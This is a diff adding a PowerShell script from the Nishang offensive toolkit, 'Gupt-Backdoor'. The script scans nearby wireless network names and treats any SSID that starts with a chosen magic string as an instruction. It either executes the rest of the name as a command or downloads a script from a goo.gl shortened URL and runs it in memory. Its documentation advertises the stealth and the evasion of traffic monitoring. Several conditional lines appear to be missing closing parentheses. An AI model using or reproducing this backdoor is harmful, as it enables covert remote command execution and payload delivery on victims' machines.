1+ <#
2+ . SYNOPSIS
3+ Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names.
4+
5+ . DESCRIPTION
6+ Gupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of
7+ each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', rest of the SSID name is considered to be a command and
8+ exeucted. If the 5th character is a 'u', rest of the SSID is considered the id part of Google URL Shortener and a script is downloaded and
9+ executed in memory from the URL. See examples for usage.
10+
11+ Gupt does not connect to any Wireless network and this makes it more stealthy and helps in bypassing network traffic monitoring.
12+
13+ . PARAMETER MagicString
14+ The string which Gupt would compare with the available SSIDs.
15+
16+ . PARAMETER Arguments
17+ Arguments to pass to a downloaded script.
18+
19+ . EXAMPLE
20+ PS > Gupt-Backdoor -MagicString op3n -Verbose
21+ In above, Gupt will look for an SSID starting with "op3n". To execute whoami on the target, the wireless network name should be "op3ncwhoami".
22+
23+ PS > Gupt-Backdoor -MagicString op3n -Verbose
24+ In above, Gupt will look for an SSID starting with "op3n". To execute a powershell script on the target, the wireless network name should be
25+ "op3nunJEuug". Here, Gupt will use of characters after the 5th one and make the URL http://goo.gl/nJEuug. A script hosted at the URL resolved
26+ by the Google shortener would be downloaded and executed.
27+
28+ . LINK
29+ http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html
30+ https://github.com/samratashok/nishang
31+ #>
32+
33+ function Gupt-Backdoor
34+ {
35+ [CmdletBinding ()] Param (
36+
37+ [Parameter (Position = 0 , Mandatory = $True )]
38+ [String ]
39+ $MagicString ,
40+
41+ [Parameter (Position = 3 , Mandatory = $False )]
42+ [String ]
43+ $Arguments
44+
45+ )
46+ # Get list of available Wlan networks
47+ while ($True )
48+ {
49+ Write-Verbose " Checking wireless networks for instructions."
50+ $networks = Invoke-Expression " netsh wlan show network"
51+ $ssid = $networks | Select-String " SSID"
52+ $NetworkNames = $ssid -replace " .*:" -replace " "
53+ ForEach ($network in $NetworkNames )
54+ {
55+ # Check if the first four characters of our SSID matches the given MagicString
56+ if ($network.Substring (0 , 4 ) -match $MagicString.Substring (0 , 4 ))
57+ {
58+ Write-Verbose " Found a network with instructions!"
59+ # If the netowrk SSID contains fifth chracter "u", it means rest of the SSID is a URL
60+ if ($network.Substring (4 )[0 ] -eq " u"
61+ {
62+ Write-Verbose " Downloading the attack script and executing it in memory."
63+ $PayloadURL = " http://goo.gl/" + $network.Substring (5 )
64+ $webclient = New-Object System.Net.WebClient
65+ Invoke-Expression $webclient.DownloadString ($PayloadURL )
66+ if ($Arguments )
67+ {
68+ Invoke-Expression $Arguments
69+ }
70+ Start-Sleep - Seconds 10
71+ }
72+ elseif ($network.Substring (4 )[0 ] -eq " c"
73+ {
74+ $cmd = $network.Substring (5 )
75+ if ($cmd -eq " exit"
76+ {
77+ break
78+ }
79+ Write-Verbose " Command `" $cmd `" found. Executing it."
80+ Invoke-Expression $cmd
81+ Start-Sleep - Seconds 10
82+ }
83+ }
84+ }
85+ Start-Sleep - Seconds 5
86+ }
87+ }
0 commit comments